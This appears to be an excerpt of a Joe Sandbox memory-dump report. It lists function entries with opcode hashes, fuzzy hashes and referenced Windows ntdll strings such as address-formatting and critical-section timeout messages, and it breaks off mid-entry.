Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceb4971e21628a8e668e6e36dcdadbf680cabff2ae5f6e7d7b8e82df15f543b4
Instruction ID: 3c2aacf0cd395cd03a4af7e9b45b3b430fa098cd9380c7b7f42c0b91a8ce04c6
Opcode Fuzzy Hash: ceb4971e21628a8e668e6e36dcdadbf680cabff2ae5f6e7d7b8e82df15f543b4
Instruction Fuzzy Hash: 0090023120954842D64071588408A46401597D0305F56C031A00646A4DD6258F55B762

Uniqueness

Uniqueness Score: -1.00%

Function 01762BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fb5b4764b72a050a8247120bd175e9cd57cf08ed0f3e3399c90f9a76a870fc4
Instruction ID: 0715c8951cf3d83ece13f569c07865cf7debaee774d1d52b7b7e51d49cd6ffa3
Opcode Fuzzy Hash: 6fb5b4764b72a050a8247120bd175e9cd57cf08ed0f3e3399c90f9a76a870fc4
Instruction Fuzzy Hash: 7B90023160950802D65071588418746400597D0301F56C031A0024664DC7558B5577A2

Uniqueness

Uniqueness Score: -1.00%

Function 01762B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14b006a843e67b9d31218cccbeef6c2565cef0a6aa76de87324b4ced519f21e8
Instruction ID: 01cc52ba4426bd97b257de4e048b0990d000cc8fa79a75e4694c56b58a59a67d
Opcode Fuzzy Hash: 14b006a843e67b9d31218cccbeef6c2565cef0a6aa76de87324b4ced519f21e8
Instruction Fuzzy Hash: CB90023120550802D60471588808686400597D0301F56C031A6024665ED6658A917232

Uniqueness

Uniqueness Score: -1.00%

Function 01762AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3236472c8b4cda0ef1416964d8572b0b46b0f52144d21812863e99dce35bc1a6
Instruction ID: 0dc78222d005ba8d6fc12aa139e0184226f1e869cb76721644ed2cc9570cc3f5
Opcode Fuzzy Hash: 3236472c8b4cda0ef1416964d8572b0b46b0f52144d21812863e99dce35bc1a6
Instruction Fuzzy Hash: 57900225225500020645B558460850B4445A7D6351796C035F14165A0CC6218A655322

Uniqueness

Uniqueness Score: -1.00%

Function 01762AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02b42350d818b09e9dfaa71b294d52bf73c199d6e88f07fc7d287112fc5971d2
Instruction ID: 6f2e07dee98cd8bf884e6ddc7aa62b9783fa0cf27d1e58f7a2f2cbbd6e326979
Opcode Fuzzy Hash: 02b42350d818b09e9dfaa71b294d52bf73c199d6e88f07fc7d287112fc5971d2
Instruction Fuzzy Hash: 679002A1205640924A00B258C408B0A850597E0201F56C036E1054570CC5258A519236

Uniqueness

Uniqueness Score: -1.00%

Function 01762D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 522c0de06f06755ce24be2b737c032705bd0b921c22a1db6078d7ca8a9141e57
Instruction ID: d1b9f3c2becbd4ca080476e09a9f81f5a6713616d13964468c6d120985579784
Opcode Fuzzy Hash: 522c0de06f06755ce24be2b737c032705bd0b921c22a1db6078d7ca8a9141e57
Instruction Fuzzy Hash: 0290022120954442D6007558940CA06400597D0205F56D031A10645A5DC6358A51A232

Uniqueness

Uniqueness Score: -1.00%

Function 01762DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77e94404c320ebd92d427a9071804a67db414e48cb62fa6c28067db0e3474c73
Instruction ID: 67e486a376a67d209709cf6e86177a22ac7af6c7ac83084a2ed1fe598b90c907
Opcode Fuzzy Hash: 77e94404c320ebd92d427a9071804a67db414e48cb62fa6c28067db0e3474c73
Instruction Fuzzy Hash: 5290023124550402D641715884086064009A7D0241F96C032A0424564EC6558B56AB62

Uniqueness

Uniqueness Score: -1.00%

Function 01762C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f9c346cb62465cd71d94d89f62f0ef0f234a28eceb3feec5b5837e1857f1a8a
Instruction ID: 3ca6a72b81cc27c48992b0729550830b8596078c5e18eb089da1a43cab948ca8
Opcode Fuzzy Hash: 2f9c346cb62465cd71d94d89f62f0ef0f234a28eceb3feec5b5837e1857f1a8a
Instruction Fuzzy Hash: 4A90023120550842D60071588408B46400597E0301F56C036A0124664DC615CA517622

Uniqueness

Uniqueness Score: -1.00%

Function 01762CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44763e0d592189c74f5a6b63d82e26cd2e0dc1380e772b304b60e67e5e663533
Instruction ID: 2d8c70de2c4e6fd9f603f94b09dc5cc648541451a9338d66aa5e7007801324f7
Opcode Fuzzy Hash: 44763e0d592189c74f5a6b63d82e26cd2e0dc1380e772b304b60e67e5e663533
Instruction Fuzzy Hash: 7C90023120550403D6007158950C707400597D0201F56D431A0424568DD6568A516222

Uniqueness

Uniqueness Score: -1.00%

Function 01762CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dedcaabe47d61ddfd30d284cdb48eac2440b0660ef4d3e2f0277392e5843bd55
Instruction ID: 88a58601332487e2cc11f22204d0e4de25c0b2b556fee5fef840dfd8f33e2298
Opcode Fuzzy Hash: dedcaabe47d61ddfd30d284cdb48eac2440b0660ef4d3e2f0277392e5843bd55
Instruction Fuzzy Hash: 8190022160950402D6407158941C706401597D0201F56D031A0024564DC6598B5567A2

Uniqueness

Uniqueness Score: -1.00%

Function 01762F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cae4173f32a435f7b3af3198df85c4fd58d47b9187bcd2ad99b11b4bf016335b
Instruction ID: 012a6eecdc388d8edb39fe489f768273fdac9bf558ef43055c4e1d0831f27bcc
Opcode Fuzzy Hash: cae4173f32a435f7b3af3198df85c4fd58d47b9187bcd2ad99b11b4bf016335b
Instruction Fuzzy Hash: 6F90026121550042D60471588408706404597E1201F56C032A2154564CC5298E615226

Uniqueness

Uniqueness Score: -1.00%

Function 01762FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49fda1b7858ce07dd1fbb255b9020c4775feedd59c29656db7909a9ae9e9a312
Instruction ID: ff4b3cca795d54c19a22a690eee36f76a5c662edfb669b98fc8b8a2b911d6e87
Opcode Fuzzy Hash: 49fda1b7858ce07dd1fbb255b9020c4775feedd59c29656db7909a9ae9e9a312
Instruction Fuzzy Hash: C590023120590402D6007158880C747400597D0302F56C031A5164565EC665CA916632

Uniqueness

Uniqueness Score: -1.00%

Function 01762E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d15182fe1a3845ca610bf64d393bf6b558e3a83c63c3914921992c72eead119
Instruction ID: d353c2043eebf6997b8417e0390370371823f9ad361d6e811f05e4b82a04cdb3
Opcode Fuzzy Hash: 3d15182fe1a3845ca610bf64d393bf6b558e3a83c63c3914921992c72eead119
Instruction Fuzzy Hash: 5790022130550402D602715884186064009D7D1345F96C032E1424565DC6258B53A233

Uniqueness

Uniqueness Score: -1.00%

Function 01762EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a93ab62af8e505f0104c5fb6a777dff61a822335fe0ea26b82b19fcc857590d7
Instruction ID: 82bd6962fb32a8bd1692ac26adcd46e509f36fbdec0e8e87e570926f84119f01
Opcode Fuzzy Hash: a93ab62af8e505f0104c5fb6a777dff61a822335fe0ea26b82b19fcc857590d7
Instruction Fuzzy Hash: FC90026120590403D64075588808607400597D0302F56C031A2064565ECA298E516236

Uniqueness

Uniqueness Score: -1.00%

Function 01763010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79c39eabc1282b725051ecd08b42df842b669d685c6d6b3e190f033157dbedfb
Instruction ID: a2341868aa12a411e605991a7913e10ae2fdffaa38001835c632a06c617d53aa
Opcode Fuzzy Hash: 79c39eabc1282b725051ecd08b42df842b669d685c6d6b3e190f033157dbedfb
Instruction Fuzzy Hash: 3890022120594442D64072588808B0F810597E1202F96C039A4156564CC9158A555722

Uniqueness

Uniqueness Score: -1.00%

Function 01763090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b3c102faf5e2b01819c93eabb7c94a518f708ddb4a01bdfd94ff61da44c7f88
Instruction ID: e96d7e270f179ab55a5510a91dfb645ae5ba3811d41f26684d2cda3b24fa81e0
Opcode Fuzzy Hash: 9b3c102faf5e2b01819c93eabb7c94a518f708ddb4a01bdfd94ff61da44c7f88
Instruction Fuzzy Hash: F890022124550802D6407158C4187074006D7D0601F56C031A0024564DC6168B6567B2

Uniqueness

Uniqueness Score: -1.00%

Function 017635C0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1806fd3bcd3bb71a097d62487ca7a5ce529e2411d6bb6ce6e707553ec6f249d6
Instruction ID: b4217b1437d65659a256b99a2095463e0f44cce8bd75ab5093f7e387ccb1db6f
Opcode Fuzzy Hash: 1806fd3bcd3bb71a097d62487ca7a5ce529e2411d6bb6ce6e707553ec6f249d6
Instruction Fuzzy Hash: EB90023160960402D60071588518706500597D0201F66C431A0424578DC7958B5166A3

Uniqueness

Uniqueness Score: -1.00%

Function 017639B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e5e8a6ffb5beccaf085e08fb4e9b2ec0f53e57d027d087d40fb9b1813f21c2b
Instruction ID: ea9e702fbc1a256cb2d72fdf1556f28a4baa4ea54ee583244b53cd6d087a9242
Opcode Fuzzy Hash: 1e5e8a6ffb5beccaf085e08fb4e9b2ec0f53e57d027d087d40fb9b1813f21c2b
Instruction Fuzzy Hash: 1F90022124955102D650715C84086168005B7E0201F56C031A08145A4DC5558A556322

Uniqueness

Uniqueness Score: -1.00%

Function 01763D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7df000a425f2a28584baa55b74dc7d4b7966c2629c521f3ed0b4ff16bdd25dad
Instruction ID: dd89340cb0f5596f32c6f382878338044ba0ede3612c73785ff05b0b4c4ac8d3
Opcode Fuzzy Hash: 7df000a425f2a28584baa55b74dc7d4b7966c2629c521f3ed0b4ff16bdd25dad
Instruction Fuzzy Hash: 8390023520550402DA1071589808646404697D0301F56D431A0424568DC6548AA1A222

Uniqueness

Uniqueness Score: -1.00%

Function 01763D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a85e760d6c95d100b533167cfe17dcceef86e3e0146bc41c67937e0d497a8af
Instruction ID: 1359757081b8d6f89ee8978b24859fff7a0f614623e52348569b2cc399182689
Opcode Fuzzy Hash: 1a85e760d6c95d100b533167cfe17dcceef86e3e0146bc41c67937e0d497a8af
Instruction Fuzzy Hash: 51900231206501429A4072589808A4E810597E1302F96D435A0015564CC9148A615322

Uniqueness

Uniqueness Score: -1.00%

Function 01762C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: a6829e4c67f372c4345bb54c3a2bcf42fca153cb3710fa567e667a5536103ef7
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 01762890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0176293C
___swprintf_l.LIBCMT ref: 0176295E
___swprintf_l.LIBCMT ref: 017629A3
___swprintf_l.LIBCMT ref: 0179A52E

Strings

::%hs%u.%u.%u.%u, xrefs: 0179A527
ffff:, xrefs: 0179A504
:%u.%u.%u.%u, xrefs: 0179A5B8
::ffff:0:%u.%u.%u.%u, xrefs: 0179A54E

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
Instruction ID: b1c81f082015e3e1ff10aa9068d89fecfdd11b82b8a53be36107d0e4522771e2
Opcode Fuzzy Hash: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
Instruction Fuzzy Hash: 7F51D5B1B00216AFDF51DB9C8C9097EFBBCBB48240B14C169E965D7646D734DE04CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 017D2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 017D24A6
___swprintf_l.LIBCMT ref: 017D24E2
___swprintf_l.LIBCMT ref: 017D257D
___swprintf_l.LIBCMT ref: 017D25A3
___swprintf_l.LIBCMT ref: 017D25C8
___swprintf_l.LIBCMT ref: 017D2608

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 017D24DA
ffff:, xrefs: 017D247D, 017D249D
:%u.%u.%u.%u, xrefs: 017D25FF
::%hs%u.%u.%u.%u, xrefs: 017D249E

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
Instruction ID: 2484f09295321102679f4ece7783770374025f08f51f0e7e7bec6b488a5b1c37
Opcode Fuzzy Hash: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
Instruction Fuzzy Hash: D451F6B1A0064AAECB31DF5CC99097FFBF8EB44200B648899E997D7646E674DE018760

Uniqueness

Uniqueness Score: -1.00%

Function 01757630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01794725
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01794742
ExecuteOptions, xrefs: 017946A0
CLIENT(ntdll): Processing section info %ws..., xrefs: 01794787
Execute=1, xrefs: 01794713
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01794655
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017946FC

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
Instruction ID: c36553e278c428ac8b2bdb3c7bf9d8ce048224f4f87d58cf864866e6b4ab8ef9
Opcode Fuzzy Hash: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
Instruction Fuzzy Hash: 75511B71600219AAEF15AAA8EC99FADF7ACEF14304F8400D9EA05A71C1D7B0DA45CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0176B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0176B6BF

Strings

-, xrefs: 0176B650
+, xrefs: 0176B65A
0, xrefs: 0176B66F
0, xrefs: 0176B695

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: fc667bba44a4044465d3398c88dc1083ffdf979374424fc90857a48f389340eb
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: CC81A070F4524A9EEF258E6CC8917FEFBB9AF46320F18415ADD51E7291C73898408B91

Uniqueness

Uniqueness Score: -1.00%

Function 017D20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 017D214F
___swprintf_l.LIBCMT ref: 017D2172

Strings

[, xrefs: 017D212B
%%%u, xrefs: 017D2146
]:%u, xrefs: 017D2169

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
Instruction ID: 8c6c7795221a3f309ec49c41f5346410c9e0435daa3245c2ea01b1541b0e0358
Opcode Fuzzy Hash: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
Instruction Fuzzy Hash: D921817AA0021DABDB11DE79CC44AAEFBF9AF54650F044116E915E3205E7319A028BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0174F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017902BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017902E7
RTL: Re-Waiting, xrefs: 0179031E

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
Instruction ID: 0398d7809a5c936a496418bf9516e0741106963cf7f255da7569b1e117a08df3
Opcode Fuzzy Hash: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
Instruction Fuzzy Hash: E6E1AB716187419FEB25CF2CD884B2AFBE4AB84314F140A5DF5A5CB2E1D774D948CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0175BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 01797B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01797B7F
RTL: Re-Waiting, xrefs: 01797BAC

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
Instruction ID: 34376e181398082789d36b94b43678a357319e66b62b4c97609888c26fe7c05d
Opcode Fuzzy Hash: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
Instruction Fuzzy Hash: 9B41D2317047029FDB25DE29D840B6AF7E6EF98710F100A1DFE5ADB680DBB1E9058B91

Uniqueness

Uniqueness Score: -1.00%

Function 0175B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0179728C

Strings

RTL: Resource at %p, xrefs: 017972A3
RTL: Re-Waiting, xrefs: 017972C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01797294

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
Instruction ID: 41ccccec3631e508df0e5faae036b85c319b02d4541762d24077b5be8a1f0050
Opcode Fuzzy Hash: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
Instruction Fuzzy Hash: 25411031614202ABCB25CE29DC81B6AFBA6FF94710F100658FD55AB280DB70E8068BD1

Uniqueness

Uniqueness Score: -1.00%

Function 017D2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 017D238D
___swprintf_l.LIBCMT ref: 017D23B3

Strings

]:%u, xrefs: 017D23AA
%%%u, xrefs: 017D2384

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
Instruction ID: 1239a3370454f295d773961046354361464e60780b7f443ad738a404e22f19d9
Opcode Fuzzy Hash: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
Instruction Fuzzy Hash: F0314172A00219AFDB20DF2DCC44BAEF7B8AB54610F54455AED49E3245EF30AA458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 01767D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01767E8B

Strings

+, xrefs: 01767DE8
-, xrefs: 01767DDD

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
